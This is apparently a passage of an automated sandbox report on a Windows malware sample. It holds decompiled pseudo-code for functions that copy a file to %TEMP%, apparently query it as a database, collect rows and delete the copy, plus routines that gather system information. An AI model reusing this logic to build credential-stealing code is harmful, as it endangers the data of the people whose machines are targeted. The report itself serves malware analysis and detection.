                                                                                                    0x00410c3d
                                                                                                    0x00410c42
                                                                                                    0x00410c45
                                                                                                    0x00410c4a
                                                                                                    0x00410c55
                                                                                                    0x00410c60
                                                                                                    0x00410c6a
                                                                                                    0x00410c79
                                                                                                    0x00410c84
                                                                                                    0x00410c8f
                                                                                                    0x00410c9a
                                                                                                    0x00410ca9
                                                                                                    0x00410cc5
                                                                                                    0x00410ccc
                                                                                                    0x00410cce
                                                                                                    0x00410cd1
                                                                                                    0x00410cd3
                                                                                                    0x00410ceb
                                                                                                    0x00410cfd
                                                                                                    0x00410d04
                                                                                                    0x00410d06
                                                                                                    0x00410d09
                                                                                                    0x00410d0b
                                                                                                    0x00410d67
                                                                                                    0x00410d6b
                                                                                                    0x00410d72
                                                                                                    0x00410d75
                                                                                                    0x00410d78
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410d18
                                                                                                    0x00410d29
                                                                                                    0x00410d3c
                                                                                                    0x00410d43
                                                                                                    0x00410d45
                                                                                                    0x00410d4d
                                                                                                    0x00410d52
                                                                                                    0x00410d55
                                                                                                    0x00410d62
                                                                                                    0x00410d62
                                                                                                    0x00410d67
                                                                                                    0x00410d0b
                                                                                                    0x00410d7a
                                                                                                    0x00410d7e
                                                                                                    0x00410d85
                                                                                                    0x00410d8c
                                                                                                    0x00410d93
                                                                                                    0x00410d98
                                                                                                    0x00410d9b
                                                                                                    0x00410db0
                                                                                                    0x00410dbe
                                                                                                    0x00410cab
                                                                                                    0x00410cad
                                                                                                    0x00410cb0
                                                                                                    0x00410cb0
                                                                                                    0x00410dc5
                                                                                                    0x00410dc8
                                                                                                    0x00410dcb
                                                                                                    0x00410dd8
                                                                                                    0x00410de0
                                                                                                    0x00410de8
                                                                                                    0x00410df0
                                                                                                    0x00410dfd
                                                                                                    0x00410e05
                                                                                                    0x00410e12
                                                                                                    0x00410e1f

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32(00000000,00410DA0,?,00000000,00410E20,?,00000000,0041B0FC,00000000,00000008,00000000,00000000,?,00411311,?,0041156C), ref: 00410BFD
                                                                                                    • CopyFileW.KERNEL32(00000000,00000000,000000FF), ref: 00410C79
                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00410DBE
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CopyCountDeleteTick
                                                                                                    • String ID: %TEMP%$.tmp
                                                                                                    • API String ID: 2381671008-3650661790
                                                                                                    • Opcode ID: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                                                                                                    • Instruction ID: 978216aeb9802c3a8092c63d781cd7ad87e87d7acf88f4e3b280f19958954086
                                                                                                    • Opcode Fuzzy Hash: 4a067d1f8ba6d400319fcf7a723a146227050b837b1c7306f0a806063b549887
                                                                                                    • Instruction Fuzzy Hash: 7C710C71A00109AFDB00EBD5DC42ADEBBB9EF48318F50447AF514F7292DA78AE458A58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410900 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 197fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 46%
                                                                                                    			E00410900(char __eax, void* __ebx, intOrPtr __edx, void* __edi, void* __esi) {
				char _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				intOrPtr _v56;
				char _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				WCHAR* _t76;
				intOrPtr* _t91;
				void* _t93;
				intOrPtr* _t95;
				intOrPtr* _t99;
				intOrPtr* _t132;
				void* _t134;
				intOrPtr* _t136;
				void* _t138;
				intOrPtr* _t140;
				intOrPtr* _t146;
				void* _t148;
				void* _t154;
				intOrPtr _t174;
				intOrPtr _t176;
				intOrPtr _t183;
				intOrPtr _t187;
				intOrPtr _t188;
				void* _t189;
				void* _t190;

				_t185 = __esi;
				_t153 = __ebx;
				_t187 = _t188;
				_t154 = 9;
				do {
					_push(0);
					_push(0);
					_t154 = _t154 - 1;
					_t192 = _t154;
				} while (_t154 != 0);
				_push(_t154);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = __eax;
				E004040F4( &_v8);
				_push(_t187);
				_push(0x410b63);
				_push( *[fs:eax]);
				 *[fs:eax] = _t188;
				E004034E4( &_v28);
				_push(_t187);
				_push(0x410ae8);
				_push( *[fs:eax]);
				 *[fs:eax] = _t188;
				E00406FDC(GetTickCount(), __ebx,  &_v48, __esi, _t192);
				_push(_v48);
				E00406F1C( &_v52, __ebx, __edi, __esi, _t192);
				_push(_v52);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t153,  &_v40, _t192);
				E004062D8(L"%TEMP%",  &_v60, _t192);
				_push(_v60);
				_push(0x410b9c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v56, _t153,  &_v44, _t192);
				_t76 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t76, 0xffffffff);
				E0040377C( &_v64, _v44);
				E00404AFC(_v64, _t153, _t154,  &_v36, _t185, _t192);
				E00403D2C( &_v68, _v36);
				if(E004076B0(_v68, _t153, _t154) != 0) {
					_t91 =  *0x41b55c; // 0x41c784
					_t93 =  *((intOrPtr*)( *_t91))(E00403990(_v36),  &_v16);
					_t189 = _t188 + 8;
					__eflags = _t93;
					if(_t93 == 0) {
						E00408120(0x11,  &_v72);
						_t132 =  *0x41b5cc; // 0x41c78c
						_t134 =  *((intOrPtr*)( *_t132))(_v16, E00403990(_v72), 0xffffffff,  &_v20,  &_v24);
						_t190 = _t189 + 0x14;
						__eflags = _t134;
						if(_t134 == 0) {
							while(1) {
								_t136 =  *0x41b600; // 0x41c790
								_t138 =  *((intOrPtr*)( *_t136))(_v20);
								__eflags = _t138 - 0x64;
								if(_t138 != 0x64) {
									goto L9;
								}
								_t140 =  *0x41b588; // 0x41c794
								E004036DC( &_v76,  *((intOrPtr*)( *_t140))(_v20, 0, _v28));
								_t146 =  *0x41b588; // 0x41c794
								_t148 =  *((intOrPtr*)( *_t146))(_v20, 1, 0x410ba8, _v76);
								_t190 = _t190 + 0x10;
								E004036DC( &_v80, _t148);
								_push(_v80);
								_push(E00410BB4);
								E00403850();
							}
						}
					}
					L9:
					_t95 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t95))(_v20);
					_t99 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t99))(_v16);
					_pop(_t174);
					 *[fs:eax] = _t174;
					E00403D2C(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t183);
					 *[fs:eax] = _t183;
				}
				_pop(_t176);
				 *[fs:eax] = _t176;
				_push(E00410B6A);
				E00403508( &_v80, 3);
				E00403B80( &_v68);
				E004034E4( &_v64);
				E00403B98( &_v60, 6);
				E004034E4( &_v36);
				E00403B80( &_v32);
				E004034E4( &_v28);
				return E00403B80( &_v8);
			}










































                                                                                                    0x00410900
                                                                                                    0x00410900
                                                                                                    0x00410901
                                                                                                    0x00410903
                                                                                                    0x00410908
                                                                                                    0x00410908
                                                                                                    0x0041090a
                                                                                                    0x0041090c
                                                                                                    0x0041090c
                                                                                                    0x0041090c
                                                                                                    0x0041090f
                                                                                                    0x00410910
                                                                                                    0x00410911
                                                                                                    0x00410912
                                                                                                    0x00410913
                                                                                                    0x00410916
                                                                                                    0x0041091c
                                                                                                    0x00410923
                                                                                                    0x00410924
                                                                                                    0x00410929
                                                                                                    0x0041092c
                                                                                                    0x00410932
                                                                                                    0x00410939
                                                                                                    0x0041093a
                                                                                                    0x0041093f
                                                                                                    0x00410942
                                                                                                    0x0041094d
                                                                                                    0x00410952
                                                                                                    0x00410958
                                                                                                    0x0041095d
                                                                                                    0x00410960
                                                                                                    0x0041096d
                                                                                                    0x00410978
                                                                                                    0x00410985
                                                                                                    0x0041098a
                                                                                                    0x0041098d
                                                                                                    0x00410992
                                                                                                    0x0041099d
                                                                                                    0x004109a8
                                                                                                    0x004109b2
                                                                                                    0x004109c1
                                                                                                    0x004109cc
                                                                                                    0x004109d7
                                                                                                    0x004109e2
                                                                                                    0x004109f1
                                                                                                    0x00410a0d
                                                                                                    0x00410a14
                                                                                                    0x00410a16
                                                                                                    0x00410a19
                                                                                                    0x00410a1b
                                                                                                    0x00410a33
                                                                                                    0x00410a45
                                                                                                    0x00410a4c
                                                                                                    0x00410a4e
                                                                                                    0x00410a51
                                                                                                    0x00410a53
                                                                                                    0x00410aaf
                                                                                                    0x00410ab3
                                                                                                    0x00410aba
                                                                                                    0x00410abd
                                                                                                    0x00410ac0
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410a60
                                                                                                    0x00410a71
                                                                                                    0x00410a84
                                                                                                    0x00410a8b
                                                                                                    0x00410a8d
                                                                                                    0x00410a95
                                                                                                    0x00410a9a
                                                                                                    0x00410a9d
                                                                                                    0x00410aaa
                                                                                                    0x00410aaa
                                                                                                    0x00410aaf
                                                                                                    0x00410a53
                                                                                                    0x00410ac2
                                                                                                    0x00410ac6
                                                                                                    0x00410acd
                                                                                                    0x00410ad4
                                                                                                    0x00410adb
                                                                                                    0x00410ae0
                                                                                                    0x00410ae3
                                                                                                    0x00410af8
                                                                                                    0x00410b06
                                                                                                    0x004109f3
                                                                                                    0x004109f5
                                                                                                    0x004109f8
                                                                                                    0x004109f8
                                                                                                    0x00410b0d
                                                                                                    0x00410b10
                                                                                                    0x00410b13
                                                                                                    0x00410b20
                                                                                                    0x00410b28
                                                                                                    0x00410b30
                                                                                                    0x00410b3d
                                                                                                    0x00410b45
                                                                                                    0x00410b4d
                                                                                                    0x00410b55
                                                                                                    0x00410b62

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32(00000000,00410AE8,?,00000000,00410B63,?,00000000,0041B0FC,00000000,00000008,00000000,00000000,?,004116D3,?,00411808), ref: 00410945
                                                                                                    • CopyFileW.KERNEL32(00000000,00000000,000000FF), ref: 004109C1
                                                                                                    • DeleteFileW.KERNEL32(00000000), ref: 00410B06
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: File$CopyCountDeleteTick
                                                                                                    • String ID: %TEMP%$.tmp
                                                                                                    • API String ID: 2381671008-3650661790
                                                                                                    • Opcode ID: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                                                                                                    • Instruction ID: 1e08b77d5c93ddd244bb37ca777f3c967e0d5c0e96542229b92685f54af29c93
                                                                                                    • Opcode Fuzzy Hash: b6365babbb2d3b2e1b37703ec200a2ec6b79da26c3864396c2c11ec0f131d7bb
                                                                                                    • Instruction Fuzzy Hash: DA710B71A04109AFDB00EF95DC41EDEBBB9EF48318F104476F514F72A2DA78AE458B58
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00402AC4 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 49registryCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 65%
                                                                                                    			E00402AC4() {
				void* _v8;
				char _v12;
				int _v16;
				signed short _t12;
				signed short _t14;
				intOrPtr _t27;
				void* _t29;
				void* _t31;
				intOrPtr _t32;

				_t29 = _t31;
				_t32 = _t31 + 0xfffffff4;
				_v12 =  *0x41b018 & 0x0000ffff;
				if(RegOpenKeyExA(0x80000002, "SOFTWARE\\Borland\\Delphi\\RTL", 0, 1,  &_v8) != 0) {
					_t12 =  *0x41b018; // 0x1332
					_t14 = _t12 & 0x0000ffc0 | _v12 & 0x0000003f;
					 *0x41b018 = _t14;
					return _t14;
				} else {
					_push(_t29);
					_push(E00402B35);
					_push( *[fs:eax]);
					 *[fs:eax] = _t32;
					_v16 = 4;
					RegQueryValueExA(_v8, "FPUMaskValue", 0, 0,  &_v12,  &_v16);
					_pop(_t27);
					 *[fs:eax] = _t27;
					_push(0x402b3c);
					return RegCloseKey(_v8);
				}
			}












                                                                                                    0x00402ac5
                                                                                                    0x00402ac7
                                                                                                    0x00402ad1
                                                                                                    0x00402aed
                                                                                                    0x00402b3c
                                                                                                    0x00402b4e
                                                                                                    0x00402b51
                                                                                                    0x00402b5a
                                                                                                    0x00402aef
                                                                                                    0x00402af1
                                                                                                    0x00402af2
                                                                                                    0x00402af7
                                                                                                    0x00402afa
                                                                                                    0x00402afd
                                                                                                    0x00402b19
                                                                                                    0x00402b20
                                                                                                    0x00402b23
                                                                                                    0x00402b26
                                                                                                    0x00402b34
                                                                                                    0x00402b34

                                                                                                    APIs
                                                                                                    • RegOpenKeyExA.ADVAPI32(80000002,SOFTWARE\Borland\Delphi\RTL,00000000,00000001,?), ref: 00402AE6
                                                                                                    • RegQueryValueExA.ADVAPI32 ref: 00402B19
                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00402B2F
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: CloseOpenQueryValue
                                                                                                    • String ID: FPUMaskValue$SOFTWARE\Borland\Delphi\RTL
                                                                                                    • API String ID: 3677997916-4173385793
                                                                                                    • Opcode ID: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                    • Instruction ID: 9172d05214030136d6eeabac91fa7c92d03713ed8c8260d1a9efe939ba63eb8f
                                                                                                    • Opcode Fuzzy Hash: c24f3397a1a0978606a1aef1272915d0389f866a146333db21e610f4ec5f9f7b
                                                                                                    • Instruction Fuzzy Hash: 04019275500308B9DB21AF908D46FAA7BB8D708700F600076BA04F66D0E7B8AA10979C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00416584 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 46libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 66%
                                                                                                    			E00416584(void* __eax, void* __ebx, void* __esi, void* __eflags) {
				intOrPtr _v56;
				intOrPtr _v60;
				char _v68;
				char _v72;
				_Unknown_base(*)()* _t13;
				intOrPtr _t36;
				void* _t38;
				void* _t39;
				void* _t41;
				void* _t43;

				_t43 = __eflags;
				_v72 = 0;
				_t38 = __eax;
				 *[fs:eax] = _t41 + 0xffffffbc;
				_t13 = GetProcAddress(LoadLibraryA("kernel32.dll"), "GlobalMemoryStatusEx");
				E004028E0( &_v68, 0x40);
				_v68 = 0x40;
				 *_t13( &_v68,  *[fs:eax], 0x41660e, _t41, __esi, __ebx, _t39);
				E00406FDC(E00404570(_v60, _v56, 0x100000, 0), _t13,  &_v72, _t38, _t43);
				E0040377C(_t38, _v72);
				_pop(_t36);
				 *[fs:eax] = _t36;
				_push(E00416615);
				return E00403B80( &_v72);
			}













                                                                                                    0x00416584
                                                                                                    0x0041658e
                                                                                                    0x00416591
                                                                                                    0x0041659e
                                                                                                    0x004165b1
                                                                                                    0x004165c2
                                                                                                    0x004165c7
                                                                                                    0x004165d2
                                                                                                    0x004165e9
                                                                                                    0x004165f3
                                                                                                    0x004165fa
                                                                                                    0x004165fd
                                                                                                    0x00416600
                                                                                                    0x0041660d

                                                                                                    APIs
                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll), ref: 004165AB
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll,GlobalMemoryStatusEx,00000000,0041660E,?,0041B0FC,?), ref: 004165B1
                                                                                                      • Part of subcall function 00403B80: SysFreeString.OLEAUT32(00000000), ref: 00403B8E
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressFreeLibraryLoadProcString
                                                                                                    • String ID: @$GlobalMemoryStatusEx$kernel32.dll
                                                                                                    • API String ID: 923276998-3878206809
                                                                                                    • Opcode ID: 8e854a2ba74b1c5241b7f672217e8f5dde30ec227ceeb4d776eac7be45f0136a
                                                                                                    • Instruction ID: ae4c68d41a3a4174a937c26ab83d8f0c6d254553f6270358502c1b43c0ddce29
                                                                                                    • Opcode Fuzzy Hash: 8e854a2ba74b1c5241b7f672217e8f5dde30ec227ceeb4d776eac7be45f0136a
                                                                                                    • Instruction Fuzzy Hash: A3018871A002086BD711EBA5DC42E8EB7BDEB88744F61413AF504B32D1E77CAD01855C
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00406654 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 32libraryloaderCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 33%
                                                                                                    			E00406654(void* __ecx) {
				signed char _t3;
				signed char _t7;
				intOrPtr* _t8;
				signed char* _t11;

				_t8 = GetProcAddress(GetModuleHandleA("kernel32.dll"), "IsWow64Process");
				_t3 = 0;
				 *_t11 = 0;
				if(_t8 != 0) {
					_push(_t11);
					_push(GetCurrentProcess());
					if( *_t8() == 0 ||  *_t11 == 0) {
						_t7 = 0;
					} else {
						_t7 = 1;
					}
					_t3 =  ~_t7;
					asm("sbb eax, eax");
					 *_t11 = _t3;
				}
				asm("sbb eax, eax");
				return _t3 + 1;
			}







                                                                                                    0x0040666b
                                                                                                    0x0040666d
                                                                                                    0x0040666f
                                                                                                    0x00406674
                                                                                                    0x00406676
                                                                                                    0x0040667c
                                                                                                    0x00406681
                                                                                                    0x00406689
                                                                                                    0x0040668d
                                                                                                    0x0040668d
                                                                                                    0x0040668d
                                                                                                    0x0040668f
                                                                                                    0x00406691
                                                                                                    0x00406693
                                                                                                    0x00406693
                                                                                                    0x0040669a
                                                                                                    0x0040669f

                                                                                                    APIs
                                                                                                    • GetModuleHandleA.KERNEL32(kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?,EXE_PATH : ,?), ref: 00406660
                                                                                                    • GetProcAddress.KERNEL32(00000000,kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?,EXE_PATH : ), ref: 00406666
                                                                                                    • GetCurrentProcess.KERNEL32(?,00000000,kernel32.dll,IsWow64Process,?,?,004066D4,?,00417330,00000000,004175F4,?,Windows : ,?,,?), ref: 00406677
                                                                                                    Strings
                                                                                                    Memory Dump Source
                                                                                                    • Source File: 00000009.00000002.675282009.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                    Joe Sandbox IDA Plugin
                                                                                                    • Snapshot File: hcaresult_9_2_400000_vbc.jbxd
                                                                                                    Yara matches
                                                                                                    Similarity
                                                                                                    • API ID: AddressCurrentHandleModuleProcProcess
                                                                                                    • String ID: IsWow64Process$kernel32.dll
                                                                                                    • API String ID: 4190356694-3024904723
                                                                                                    • Opcode ID: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
                                                                                                    • Instruction ID: ba80d2391f81007aa42feea1da534082dc1adbf3711fe3d895332dec38dcedd5
                                                                                                    • Opcode Fuzzy Hash: bb90ac27b46476fccc6d3856fb06f30bc2750b404d13dc0022771fe07b4660df
                                                                                                    • Instruction Fuzzy Hash: B0E06DB12143019EEB007EB58881A3B21C89B44305F130E3EA496F21C1E97EC8A0866D
                                                                                                    Uniqueness

                                                                                                    Uniqueness Score: -1.00%

                                                                                                    Function 00410E58 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 120fileCOMMON
                                                                                                    Download Yara Rule
                                                                                                    C-Code - Quality: 47%
                                                                                                    			E00410E58(signed int __eax, void* __ebx, intOrPtr* __ecx, intOrPtr __edx, void* __edi, void* __esi) {
				signed int _v8;
				intOrPtr _v12;
				char _v16;
				char _v20;
				char _v24;
				char _v28;
				char _v32;
				char _v36;
				char _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				intOrPtr _v117;
				signed int _t70;
				signed int _t71;
				WCHAR* _t91;
				intOrPtr* _t106;
				intOrPtr _t108;
				intOrPtr* _t110;
				intOrPtr* _t114;
				intOrPtr* _t151;
				intOrPtr _t153;
				intOrPtr* _t155;
				void* _t157;
				intOrPtr* _t159;
				intOrPtr* _t163;
				void* _t165;
				intOrPtr* _t170;
				intOrPtr* _t176;
				intOrPtr* _t182;
				void* _t184;
				intOrPtr* _t188;
				void* _t192;
				intOrPtr _t213;
				intOrPtr _t215;
				void* _t221;
				intOrPtr _t227;
				intOrPtr _t231;
				intOrPtr _t232;
				void* _t233;
				void* _t234;

				_t229 = __esi;
				_t190 = __ebx;
				_pop(_t232);
				 *__eax =  *__eax + __eax;
				 *((intOrPtr*)(__edx)) =  *((intOrPtr*)(__edx)) + __eax;
				 *__eax =  *__eax + __eax;
				 *__ecx =  *__ecx + __ecx;
				 *__eax =  *__eax | __eax;
				 *__eax =  *__eax + __eax;
				_t70 = __eax;
				 *_t70 =  *_t70 + _t70;
				_t71 = _t70 | 0x00000a00;
				 *_t71 =  *_t71 + _t71;
				_v117 = _v117 + __edx;
				_t231 = _t232;
				_t192 = 0xb;
				do {
					_push(0);
					_push(0);
					_t192 = _t192 - 1;
					_t242 = _t192;
				} while (_t192 != 0);
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_v12 = __edx;
				_v8 = _t71;
				E004040F4( &_v8);
				_push(_t231);
				_push(0x411163);
				_push( *[fs:eax]);
				 *[fs:eax] = _t232;
				E00403B80( &_v28);
				_push(_t231);
				_push(0x4110ce);
				_push( *[fs:eax]);
				 *[fs:eax] = _t232;
				E00406FDC(GetTickCount(), __ebx,  &_v52, __esi, _t242);
				_push(_v52);
				E00406F1C( &_v56, __ebx, __edi, __esi, _t242);
				_push(_v56);
				_push(L".tmp");
				E00403E1C();
				E0040781C(_v8, _t190,  &_v40, _t242);
				E004062D8(L"%TEMP%",  &_v64, _t242);
				_push(_v64);
				_push(0x41119c);
				_push(_v32);
				E00403E1C();
				E0040781C(_v60, _t190,  &_v44, _t242);
				_t91 = E00403D3C(_v44);
				CopyFileW(E00403D3C(_v40), _t91, 0xffffffff);
				E0040377C( &_v68, _v44);
				E00404AFC(_v68, _t190, _t192,  &_v36, _t229, _t242);
				E00403D2C( &_v72, _v36);
				if(E004076B0(_v72, _t190, _t192) != 0) {
					_t106 =  *0x41b55c; // 0x41c784
					_t108 =  *((intOrPtr*)( *_t106))(E00403990(_v36),  &_v16);
					_t233 = _t232 + 8;
					__eflags = _t108;
					if(_t108 == 0) {
						E00408120(0x66,  &_v76);
						_t151 =  *0x41b5cc; // 0x41c78c
						_t153 =  *((intOrPtr*)( *_t151))(_v16, E00403990(_v76), 0xffffffff,  &_v20,  &_v24);
						_t234 = _t233 + 0x14;
						__eflags = _t153;
						if(_t153 == 0) {
							while(1) {
								_t155 =  *0x41b600; // 0x41c790
								_t157 =  *((intOrPtr*)( *_t155))(_v20);
								__eflags = _t157 - 0x64;
								if(_t157 != 0x64) {
									goto L12;
								}
								_t159 =  *0x41b644; // 0x41c798
								_t163 =  *0x41b588; // 0x41c794
								_t165 =  *((intOrPtr*)( *_t163))(_v20, 3,  *((intOrPtr*)( *_t159))(_v20, 3));
								_pop(_t221);
								E004094C4(_t165,  &_v48, _t221);
								E00403D2C( &_v80, _v48);
								_t170 =  *0x41b588; // 0x41c794
								E00403C98( &_v84,  *((intOrPtr*)( *_t170))(_v20, 0, 0x4111a4, _v80, _v28));
								_t176 =  *0x41b588; // 0x41c794
								E00403C98( &_v88,  *((intOrPtr*)( *_t176))(_v20, 1, 0x4111a4, _v84));
								_t182 =  *0x41b588; // 0x41c794
								_t184 =  *((intOrPtr*)( *_t182))(_v20, 2, 0x4111b0, _v88);
								_t234 = _t234 + 0x28;
								E00403C98( &_v92, _t184);
								_push(_v92);
								_push(L"\r\n\r\n");
								E00403E1C();
								_t188 =  *0x41b584; // 0x41b0b4
								 *_t188 =  *_t188 + 1;
								__eflags =  *_t188;
							}
						}
					}
					L12:
					_t110 =  *0x41b654; // 0x41c79c
					 *((intOrPtr*)( *_t110))(_v20);
					_t114 =  *0x41b590; // 0x41c788
					 *((intOrPtr*)( *_t114))(_v16);
					_pop(_t213);
					 *[fs:eax] = _t213;
					E00403BBC(_v12, _v28);
					DeleteFileW(E00403D3C(_v44));
				} else {
					_pop(_t227);
					 *[fs:eax] = _t227;
				}
				_pop(_t215);
				 *[fs:eax] = _t215;
				_push(E0041116A);
				E00403B98( &_v92, 4);
				E004034E4( &_v76);
				E00403B80( &_v72);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 2);
				E004034E4( &_v36);
				E00403B98( &_v32, 2);
				return E00403B80( &_v8);
			}






















































                                                                                                    0x00410e58
                                                                                                    0x00410e58
                                                                                                    0x00410e58
                                                                                                    0x00410e59
                                                                                                    0x00410e5b
                                                                                                    0x00410e5d
                                                                                                    0x00410e5f
                                                                                                    0x00410e60
                                                                                                    0x00410e62
                                                                                                    0x00410e64
                                                                                                    0x00410e66
                                                                                                    0x00410e68
                                                                                                    0x00410e6d
                                                                                                    0x00410e6f
                                                                                                    0x00410e71
                                                                                                    0x00410e73
                                                                                                    0x00410e78
                                                                                                    0x00410e78
                                                                                                    0x00410e7a
                                                                                                    0x00410e7c
                                                                                                    0x00410e7c
                                                                                                    0x00410e7c
                                                                                                    0x00410e7f
                                                                                                    0x00410e80
                                                                                                    0x00410e81
                                                                                                    0x00410e82
                                                                                                    0x00410e85
                                                                                                    0x00410e8b
                                                                                                    0x00410e92
                                                                                                    0x00410e93
                                                                                                    0x00410e98
                                                                                                    0x00410e9b
                                                                                                    0x00410ea1
                                                                                                    0x00410ea8
                                                                                                    0x00410ea9
                                                                                                    0x00410eae
                                                                                                    0x00410eb1
                                                                                                    0x00410ebc
                                                                                                    0x00410ec1
                                                                                                    0x00410ec7
                                                                                                    0x00410ecc
                                                                                                    0x00410ecf
                                                                                                    0x00410edc
                                                                                                    0x00410ee7
                                                                                                    0x00410ef4
                                                                                                    0x00410ef9
                                                                                                    0x00410efc
                                                                                                    0x00410f01
                                                                                                    0x00410f0c
                                                                                                    0x00410f17
                                                                                                    0x00410f21
                                                                                                    0x00410f30
                                                                                                    0x00410f3b
                                                                                                    0x00410f46
                                                                                                    0x00410f51
                                                                                                    0x00410f60
                                                                                                    0x00410f7c
                                                                                                    0x00410f83
                                                                                                    0x00410f85
                                                                                                    0x00410f88
                                                                                                    0x00410f8a
                                                                                                    0x00410fa2
                                                                                                    0x00410fb4
                                                                                                    0x00410fbb
                                                                                                    0x00410fbd
                                                                                                    0x00410fc0
                                                                                                    0x00410fc2
                                                                                                    0x00411091
                                                                                                    0x00411095
                                                                                                    0x0041109c
                                                                                                    0x0041109f
                                                                                                    0x004110a2
                                                                                                    0x00000000
                                                                                                    0x00000000
                                                                                                    0x00410fd3
                                                                                                    0x00410fe6
                                                                                                    0x00410fed
                                                                                                    0x00410ff5
                                                                                                    0x00410ff6
                                                                                                    0x00411004
                                                                                                    0x00411017
                                                                                                    0x00411028
                                                                                                    0x0041103b
                                                                                                    0x0041104c
                                                                                                    0x0041105f
                                                                                                    0x00411066
                                                                                                    0x00411068
                                                                                                    0x00411070
                                                                                                    0x00411075
                                                                                                    0x00411078
                                                                                                    0x00411085
                                                                                                    0x0041108a
                                                                                                    0x0041108f
                                                                                                    0x0041108f
                                                                                                    0x0041108f
                                                                                                    0x00411091
                                                                                                    0x00410fc2
                                                                                                    0x004110a8
                                                                                                    0x004110ac
                                                                                                    0x004110b3
                                                                                                    0x004110ba
                                                                                                    0x004110c1
                                                                                                    0x004110c6
                                                                                                    0x004110c9
                                                                                                    0x004110de
                                                                                                    0x004110ec
                                                                                                    0x00410f62
                                                                                                    0x00410f64
                                                                                                    0x00410f67
                                                                                                    0x00410f67
                                                                                                    0x004110f3
                                                                                                    0x004110f6
                                                                                                    0x004110f9
                                                                                                    0x00411106
                                                                                                    0x0041110e
                                                                                                    0x00411116
                                                                                                    0x0041111e
                                                                                                    0x0041112b
                                                                                                    0x00411133
                                                                                                    0x00411140
                                                                                                    0x00411148
                                                                                                    0x00411155
                                                                                                    0x00411162

                                                                                                    APIs
                                                                                                    • GetTickCount.KERNEL32(00000000,004110CE,?,00000000,00411163,?,00000000,0041B0FC,00000000,00000000,00000000,?,004113F1,?,0041156C,?), ref: 00410EB4
                                                                                                    • CopyFileW.KERNEL32(00000000,00000000,000000FF), ref: 00410F30
                                                                                                    Strings
                                                                                                    Memory Dump Source
